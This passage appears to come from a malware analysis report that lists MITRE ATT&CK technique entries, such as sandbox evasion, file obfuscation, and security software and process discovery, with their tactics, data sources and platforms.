Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre